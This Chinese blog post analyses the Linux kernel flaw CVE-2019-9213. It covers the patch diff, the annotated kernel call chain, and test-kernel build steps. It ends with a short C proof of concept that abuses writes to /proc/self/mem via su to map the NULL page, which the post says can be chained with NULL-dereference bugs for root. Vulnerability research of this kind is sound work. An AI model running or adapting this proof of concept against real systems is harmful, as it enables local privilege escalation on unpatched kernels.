【kernel exploit】CVE-2019-9213 逻辑漏洞绕过 mmap_min_addr 限制

已于 2022-07-17 10:47:31 修改
阅读量1.2k 收藏
点赞数
分类专栏: 内核漏洞 内核 文章标签: linux 服务器 网络
于 2021-07-07 21:26:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/panhewu9919/article/details/118557802
版权

文章目录

影响版本:Linux-4.20.14以前(v4.20.14已修补) 5.5分。

测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项CONFIG_SLAB=y

General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB

在编译时将.config中的CONFIG_E1000CONFIG_E1000E,变更为=y。参考

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.20.7.tar.xz
$ tar -xvf linux-4.20.7.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。

漏洞描述mm/mmap.c中的expand_downwards()缺乏对mmap最小地址的检查,攻击者可以在没有SMAP保护的情况下利用空指针引用,主要原因是对错误的task进行了capability检查。这个漏洞可以绕过mmap_min_addr的限制,再配合一个空指针引用就有可能提权。现有两种提权的exp——CVE-2019-9213+cve-2018-5333CVE-2019-9213+CVE-2019-8956

补丁patch 不再调用 security_mmap_addr() 函数,直接和 mmap_min_addr 比较。

diff --git a/mm/mmap.c b/mm/mmap.c
index f901065c4c64c..fc1809b1bed67 100644
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -2426,12 +2426,11 @@ int expand_downwards(struct vm_area_struct *vma,
 {
 	struct mm_struct *mm = vma->vm_mm;
 	struct vm_area_struct *prev;
-	int error;
+	int error = 0;
 
 	address &= PAGE_MASK;
-	error = security_mmap_addr(address);
-	if (error)
-		return error;
+	if (address < mmap_min_addr)
+		return -EPERM;
 
 	/* Enforce stack_guard_gap */
 	prev = vma->vm_prev;

保护机制:开启SMEP,关闭SMAP/kaslr。

利用总结:利用LD_DEBUG=help /bin/su 1>&%d命令执行write操作,本来应检测exp的cred,结果错误检测了write进程的cred,就将低地址标记为特权可访问。

测试说明:只有在32位系统下才能成功利用,现有的结合本漏洞利用成功的exp都是32位环境,64位环境不能成功。我编译出v4.20.7的32位版本,能够成功利用。由于64位不成功,我就放弃编译了,直接用xman训练营提供的bzimage环境。

一、漏洞分析

漏洞函数调用链expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()

int expand_downwards(struct vm_area_struct *vma,
				   unsigned long address)
{
	struct mm_struct *mm = vma->vm_mm;
	struct vm_area_struct *prev;
	int error;

	address &= PAGE_MASK;
	error = security_mmap_addr(address);	// <---------- 检查权限
	if (error)
		return error;
    ...
}

static inline int security_mmap_addr(unsigned long addr)
{
	return cap_mmap_addr(addr);				// <----------
}
// 这里会判断能否分配低地址,如果通过system()调用 LD_DEBUG=help su 1>&%d 命令执行 write 操作,该函数检测的 current_cred() 就是执行write的进程的cred,而不是vma被改变的进程的cred。由于write操作是root,所以可以通过这个判断。
int cap_mmap_addr(unsigned long addr)
{
	int ret = 0;

	if (addr < dac_mmap_min_addr) {			// dac_mmap_min_addr=0x1000
		ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
				  SECURITY_CAP_AUDIT);
		/* set PF_SUPERPRIV if it turns out we allow the low mmap */
		if (ret == 0)
			current->flags |= PF_SUPERPRIV;		// 检测通过则标记为有访问权限
	}
	return ret;
}

write()函数调用链mem_write() -> mem_rw() -> access_remote_vm() -> __access_remote_vm() -> get_user_pages_remote() -> __get_user_pages_locked() -> __get_user_pages() -> find_extend_vma() -> expand_stack() -> expand_downwards() -> security_mmap_addr() -> cap_mmap_addr()

Linux对于文件系统通用的结构体是 file_operationsfs/proc/base.c中的代码提供与/proc相关的操作——proc_mem_operations.write = mem_write)。这样执行su >&%d < /dev/null/proc/self/mem 写入数据时,实际会调用 mem_write()

// (1) mem_write()
static ssize_t mem_write(struct file *file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
	return mem_rw(file, (char __user*)buf, count, ppos, 1);	// <---------
}
// (2) mem_rw()
static ssize_t mem_rw(struct file *file, char __user *buf,
			size_t count, loff_t *ppos, int write)
{
    ... ...
    while (count > 0) {	// while循环中,如果是写首先通过 copy_from_user() 函数将待写内容buf拷贝到分配的page中,然后调用 access_remote_vm() 函数写入远程进程。读则相反,先调用 access_remote_vm() 函数读取远程进程中的数据,然后调用 copy_to_user() 函数将读取的page拷贝到buf中。
		int this_len = min_t(int, count, PAGE_SIZE);

		if (write && copy_from_user(page, buf, this_len)) {
			copied = -EFAULT;
			break;
		}

		this_len = access_remote_vm(mm, addr, page, this_len, flags);	// <-------- 循环调用 access_remote_vm() 来处理远程进程中的数据
		if (!this_len) {
			if (!copied)
				copied = -EIO;
			break;
		}

		if (!write && copy_to_user(buf, page, this_len)) {
			copied = -EFAULT;
			break;
		}

		buf += this_len;
		addr += this_len;
		copied += this_len;
		count -= this_len;
	}
	*ppos = addr;

	mmput(mm);
free:
	free_page((unsigned long) page);
	return copied;
}
// (3) access_remote_vm()
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
		void *buf, int len, unsigned int gup_flags)
{
	return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags);	// <--------
}
// (4) __access_remote_vm()
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
	struct vm_area_struct *vma;
	void *old_buf = buf;
	int write = gup_flags & FOLL_WRITE;

	down_read(&mm->mmap_sem);
	/* ignore errors, just check how much was successfully transferred */
	while (len) {
		int bytes, ret, offset;
		void *maddr;
		struct page *page = NULL;

		ret = get_user_pages_remote(tsk, mm, addr, 1,	// <------------- 分析 get_user_pages_remote() 与 get_user_pages() 的区别
				gup_flags, &page, &vma, NULL);
		if (ret <= 0) {
            ... ...
        } else {
			bytes = len;
			offset = addr & (PAGE_SIZE-1);
			if (bytes > PAGE_SIZE-offset)
				bytes = PAGE_SIZE-offset;

			maddr = kmap(page);
			if (write) {
				copy_to_user_page(vma, page, addr,
						  maddr + offset, buf, bytes);
				set_page_dirty_lock(page);
			} else {
				copy_from_user_page(vma, page, addr,
						    buf, maddr + offset, bytes);
			}
			kunmap(page);
			put_page(page);
		}
		len -= bytes;
		buf += bytes;
		addr += bytes;
	}
	up_read(&mm->mmap_sem);

	return buf - old_buf;
}
// get_user_pages_remote() 与 get_user_pages() 函数(二者区别:是否跨进程)都是 __get_user_pages_locked 函数的封装,作用在于查找并将给定的虚拟地址范围固定到page。之后通过kmap函数将page映射到永久内存映射区,如果是写操作则调用 copy_to_user_page() 函数之后调用 set_page_dirty_lock() 函数将page设置为脏;读操作则调用 copy_from_user_page() 函数。之后调用kunmap函数取消映射。
// (5-1) get_user_pages_remote() —— 这里设置了 FOLL_REMOTE 标志来区分
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas, int *locked)
{
	return __get_user_pages_locked(tsk, mm, start, nr_pages, pages, vmas,	// <--------
				       locked,
				       gup_flags | FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
// (5-2) get_user_pages() 
long get_user_pages(unsigned long start, unsigned long nr_pages,
		unsigned int gup_flags, struct page **pages,
		struct vm_area_struct **vmas)
{
	return __get_user_pages_locked(current, current->mm, start, nr_pages,
				       pages, vmas, NULL,
				       gup_flags | FOLL_TOUCH);
}
EXPORT_SYMBOL(get_user_pages);
// (6) __get_user_pages_locked()
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
						struct mm_struct *mm,
						unsigned long start,
						unsigned long nr_pages,
						struct page **pages,
						struct vm_area_struct **vmas,
						int *locked,
						unsigned int flags)
{
    ... ...
    pages_done = 0;
	lock_dropped = false;
	for (;;) {
		ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
				       vmas, locked);	// __get_user_pages(): 将start开始的nr_pages个页固定到pages。返回值(成功固定的页的个数)大于0则说明调用成功,减少 nr_pages 增加 pages_done,nr_pages 为0则退出循环。
		if (!locked)
			/* VM_FAULT_RETRY couldn't trigger, bypass */
			return ret;

		/* VM_FAULT_RETRY cannot return errors */
		if (!*locked) {
			BUG_ON(ret < 0);
			BUG_ON(ret >= nr_pages);
		}

		if (!pages)
			/* If it's a prefault don't insist harder */
			return ret;

		if (ret > 0) {
			nr_pages -= ret;
			pages_done += ret;
			if (!nr_pages)
				break;
		}
		if (*locked) {
			/*
			 * VM_FAULT_RETRY didn't trigger or it was a
			 * FOLL_NOWAIT.
			 */
			if (!pages_done)
				pages_done = ret;
			break;
		}
		/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
		pages += ret;
		start += ret << PAGE_SHIFT;

		/*
		 * Repeat on the address that fired VM_FAULT_RETRY
		 * without FAULT_FLAG_ALLOW_RETRY but with
		 * FAULT_FLAG_TRIED.
		 */
		*locked = 1;
		lock_dropped = true;			// 之后再固定一个页,正常情况下应该返回0退出循环。如果没有退出循环,则nr_pages-1,pages_done+1,start地址加一个PAGE_SIZE重新开始固定。__get_user_pages函数查找vma是通过调用find_extend_vma函数实现的。
		down_read(&mm->mmap_sem);
		ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
				       pages, NULL, NULL);
		if (ret != 1) {
			BUG_ON(ret > 1);
			if (!pages_done)
				pages_done = ret;
			break;
		}
		nr_pages--;
		pages_done++;
		if (!nr_pages)
			break;
		pages++;
		start += PAGE_SIZE;
	}
	if (lock_dropped && *locked) {
		/*
		 * We must let the caller know we temporarily dropped the lock
		 * and so the critical section protected by it was lost.
		 */
		up_read(&mm->mmap_sem);
		*locked = 0;
	}
	return pages_done;
}
// (7) __get_user_pages() —— 首先查找vma,调用 follow_page_mask() 函数查询页表获取虚拟地址对应的物理页,如果返回null会调用 faultin_page() 函数。获取到page的指针之后存在pages数组中。

// (8) find_extend_vma() —— __get_user_pages函数查找vma是通过调用find_extend_vma函数实现的。如果vma->vm_start <= addr说明addr在VMA空间范围内;否则说明addr落在空洞中。如果设置了VM_GROWSDOWN标志位调用expand_stack函数扩展vma,内存不足会向低地址进行扩展。漏洞就是没有对扩展后的地址进行合理性校验,缺少 address < mmap_min_addr的判断条件,就可以mmap到NULL地址。
struct vm_area_struct *
find_extend_vma(struct mm_struct *mm, unsigned long addr)
{
	struct vm_area_struct *vma;
	unsigned long start;

	addr &= PAGE_MASK;
	vma = find_vma(mm, addr);
	if (!vma)
		return NULL;
	if (vma->vm_start <= addr)
		return vma;
	if (!(vma->vm_flags & VM_GROWSDOWN))
		return NULL;
	start = vma->vm_start;
	if (expand_stack(vma, addr))			// <---------
		return NULL;
	if (vma->vm_flags & VM_LOCKED)
		populate_vma_page_range(vma, addr, start, NULL);
	return vma;
}
// (9) expand_stack()
int expand_stack(struct vm_area_struct *vma, unsigned long address)
{
	return expand_downwards(vma, address);
}

总的来说,在最终写入的地址小于vm->start时,如果设置了 VM_GROWSDOWN 选项的话,就会调用 expand_downwards() 函数扩展vma,内存不足会向低地址进行扩展。漏洞就是没有对扩展后的地址进行合理性校验,缺少 address < mmap_min_addr 的判断条件,就可以mmap到NULL地址。

二、漏洞利用

poc分析:触发漏洞的点在于 su >&%d < /dev/null/proc/self/mem 中写入了数据,写什么数据不重要,(有su就行,读写其它进程的 proc/$pid/mem 需要 PTRACE_ATTACH 权限),重要的是通过它调用write函数。

// poc
void mmap_zero()
{
    unsigned long addr = (unsigned long)mmap((void *)0x10000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN|MAP_FIXED, -1, 0);
    if (addr != 0x10000)
    	err(2,"mmap failed");
    int fd = open("/proc/self/mem",O_RDWR);
    if (fd == -1)
        err(2,"open mem failed");
    char cmd[0x100] = {0};
    sprintf(cmd, "su >&%d < /dev/null", fd);
    while (addr)
    {
        addr -= 0x1000;
        if (lseek(fd, addr, SEEK_SET) == -1)
			err(2, "lseek failed");
		system(cmd);
    }
    printf("contents:%s\n",(char *)1);
}

参考

CVE-2019-9213——linux内核用户空间0虚拟地址映射漏洞分析

CVE-2019-9213、CVE-2019-8956的分析以及组合提权

https://www.exploit-db.com/exploits/46502

https://nvd.nist.gov/vuln/detail/CVE-2019-9213

bsauce
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
office ppsx逻辑漏洞CVE-2017-8570)
KAME_HOUSE
01-24 323
CVE-2017-8570影响office版本 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
中间件漏洞(一)CVE-2013-4547(文件名逻辑漏洞
m0_63306943的博客
05-03 1556
这里也是一样包中的请求文件的总体后缀名为.php,nginx会首先将文件交给FastCGI处理并截断则请求的文件名为 shell.jpg,之后会交给PHP-FPM处理此时php-fpm.conf中的security.limit_extensions为空,也就是说任意后缀名都可以解析为PHP 所以会将 shell.jpg 文件当作php文件处理并返回给浏览器形成逻辑漏洞。根据nginx.conf文件中location中的定义,以.php结尾的文件都解析为php。反正结果后面的.php后缀最后都会被截断掉。
kernel exploitCVE-2024-1086 nftables UAF漏洞-Dirty Pagedirectory利用方法
最新发布
panhewu9919的博客
05-10 5461
本文的利用方法参考了,改进该方法后用于提权,并引入了一些实用的利用技巧(例如TLB flushing)。基于Dirty Pagedirectory技术(页表混淆),从用户层实施内核空间镜像攻击(KSMA脏页目录技术能够对物理内存进行无限制、稳定的读写。还能通过设置权限flag来绕过权限检查,这样就能写入只读页面,例如覆写。本节以 PUD+PMD方法来阐释原理,POC中采用的是PMD+PTE策略。总体思路:利用Double-Free等漏洞将PUD和PMD分配到同一地址。
mmap_min_addr
cosmoslhf的专栏
09-06 2101
Overview mmap_min_addr is a kernel tunable that specifies the minimum virtual address that a process is allowed to mmap. Allowing processes to map low values increases the security implications of
mmap函数_分析由 mmap 导致的内存泄漏
weixin_39641463的博客
12-03 874
背景一个程序链接 TCMalloc ,同时调用 mmap / munmap 管理一部分较大的内存通过 TCMalloc 的统计信息,判断内存泄漏不是由 new / malloc 等常规接口导致的因此怀疑是 mmap 导致的内存泄漏hookhook mmap / munmap 记录下每一次调用,可以分析出是哪部分导致的内存泄漏如何存储调用信息?这涉及到三个问题的回答:buffer 是 thread...
linux内存管理笔记(三十二)----内存映射mmap
奇小葩
11-15 1608
内存映射是一个很有趣的思想,我们都知道操作系统分为用户态和内核态,用户态是不能直接和物理设备打交道,如果我们用户空间想访问硬盘的一块区域数据,则需要两次拷贝(硬盘->内核->用户),但是内存映射的设计只需要发生一次拷贝,大大提高了读取数据的效率。那么内存映射的原理和内核是如何实现的呢? 1. 内存映射概念 内存映射,简而言之就是将用户空间的一段内存区域映射到内核空间,映射成功后,用户对这段内存区域的修改可以直接反映到内核空间,同样,内核空间对这段区域的修改也直接反映给用户空间,对于用户空间和内核
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
CVE-2019-2725:WebLogic不安全反序列化-CVE-2019-2725有效负载生成器和漏洞利用
04-25
CVE-2019-2725 WebLogic Universal Exploit-CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729有效负载生成器和利用信息/帮助$ python3 weblogic_exploit.py -h====================================...
CVE-2019-9810:Windows 64位上的CVE-2019-9810 Firefox的漏洞利用
02-04
Windows上的Firefox的CVE-2019-9810 Exploit CVE-2019-9810是在发现并利用的漏洞。 它影响MozillaJavaScript引擎Spidermonkey,并用于实现渲染器折衷。 此问题已在大约两个月前的修复。问题概述简而言之,该错误允许...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以...
linux 内存管理(15) - mmap
weixin_41028621的博客
03-11 605
了解mmap机制。 1.概述   mmap 即地址的映射, 是一种内存映射文件的方法,将一个文件或者其它对象映射到进程的地址空间,实现文件磁盘地址和进程虚拟地址空间中一段虚拟地址的一一对映关系。mmap()系统调用使得进程之间通过映射同一个普通文件实现共享内存。普通文件被映射到进程地址空间后,进程可以向访问普通内存一样对文件进行访问,不必再调用read(),write()等操作。   Linu...
kernel exploitCVE-2018-5333 空指针引用漏洞
panhewu9919的博客
07-27 1289
影响版本:Linux 4.14.14以前。 5.5分。4.14.13未修补,4.14.14已修补。 测试版本:Linux-4.14.13 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项:CONFIG_RDS=y CONFIG_DEBUG_INFO=y CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allo
kernel exploitCVE-2019-8956 sctp_sendmsg()空指针引用漏洞
panhewu9919的博客
07-07 1196
kernel exploitCVE-2019-8956 sctp_sendmsg()空指针引用漏洞 影响版本:Linux-4.20.8以前(v4.20.8已修补) 4.19.21以前 7.8分。 测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项: CONFIG_IP_SCTP=y CONFIG_SLAB=y General setup —> Choose SLA
Linux 安全缓解机制总结
小吕的博客
09-12 1767
Linux 安全缓解机制总结_panhewu9919的博客-CSDN博客 学习资料: kernel-security-learning linux-kernel-defence-map A Decade of Linux Kernel Vulnerabilities, their Mitigation and Open Problems-2017 The State of Kernel Self Protection-2018 PaX/Grsecurity...
安卓开发中的安全要点(安卓官方Security Tips)
nextdoor6的博客
11-25 1040
安全要点 PreviousNext 本文内容 存储数据使用权限使用网络执行输入验证处理用户数据使用 WebView使用加密使用进程间通信动态加载代码虚拟机中的安全性原生代码中的安全性 另请参阅 Android 安全性概览权限 Android 操作系统内置了安全功能,可显著降低应用出现安全问题的频率及其造成的影响。系统经过精心设计,您在通常情况
CVE10大漏洞总结【网络安全】
heikeyouyou的博客
05-19 3039
网络安全之cve十大漏洞总结
Security options安全选项
steel0205的专栏
03-06 211
kernel 安全config选项介绍
Linux进程的管理与调度(七)--- Linux下1号进程的前世(kernel_init)今生(init进程)
|~~~热爱生活、努力学习的小伙汁~~~|
12-01 495
Linux进程的管理与调度(六)--- Linux下1号进程的前世(kernel_init)今生(init进程)init 进程 - 1号进程kernel_initinit 进程关于 init 程序附录kernel_init_freeable流程分析kernel_init分析 Linux 下有3 个特殊的进程,idle进程(PID=0)(PID = 0)(PID=0),init进程(PID=1)(PID = 1)(PID=1) 和 kthreadd进程(PID=2)(PID = 2)(PID=2)。 i
Exploit/CVE-2019-2725
04-09
CVE-2019-2725是一个安全漏洞,也被称为WebLogic Server远程代码执行漏洞。该漏洞影响Oracle WebLogic Server的版本10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以通过发送特制的HTTP请求利用该漏洞,从而在受影响的服务器上执行任意代码。 该漏洞的原因是WebLogic Server中XMLDecoder类的不正确使用。攻击者可以构造恶意的XML数据,通过发送特定的HTTP请求触发XMLDecoder解析,从而导致远程代码执行。 Oracle已经发布了修复该漏洞的补丁程序,并建议用户尽快升级受影响的WebLogic Server版本。此外,还可以通过配置网络防火墙或其他安全措施来限制对WebLogic Server的访问,以减少潜在攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值